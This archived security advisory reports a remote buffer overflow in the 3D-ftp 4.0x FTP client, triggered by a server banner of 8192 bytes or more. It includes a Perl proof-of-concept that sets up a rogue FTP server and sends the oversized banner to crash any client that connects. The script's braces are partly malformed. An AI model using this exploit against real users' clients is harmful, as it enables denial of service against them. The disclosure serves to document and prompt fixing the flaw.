TUCoPS :: Windows Apps :: bt77.txt

Buffer overflow in 3D-ftp

Product: 3D-ftp Client
Version: 4.0x
OffSite: http://www.sitegallery.net/
Problem: Remote buffer overflow

3D-ftp - Quite good Windows FTP Client. FTP Client have many opportunities

Remote buffer overflow will take place if server send long banner >= 8192
Client can not process these data and he is crash! 

Fix: Download new version.

Sample exploit in perl. For Crash 3D-ftp use: ftpbanex.pl 8193

# Banner Buffer Overflow remote exploit in FTP Clients
#                by Over_G [DWC Gr0up]
#         www.dwcgr0up.com      www.overg.com
use IO::Socket;
$port = "21";
$data = "a";
$bsize = $ARGV[0];

print "\n  Banner Buffer Overflow remote exploit in FTP Clients\n\n";
print "           by Over G[DWC Gr0up]\n";
print "     www.dwcgr0up.com www.overg.com\n\n";

if (defined $bsize) {}
 else {
  print "Incorrect parameters.\n";
  die "Usage: perl ftpbanex.pl [buffer_size]\n";
print "Creating server...\n";
$buf .= $data x $bsize;
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM, Reuse => 1, Listen => 2)
or die "Couldn't create server.\n";
print "Awayting connections...\n";
while ($client = $server->accept())
 print "Client connected.\n";
 print "Attacking...";
 print $client "$buf";
 print "OK\n";

Greetz to: DHGroup, Gipshack.

www.overg.com www.dwcgr0up.com
regards, Over G[DWC Gr0up]

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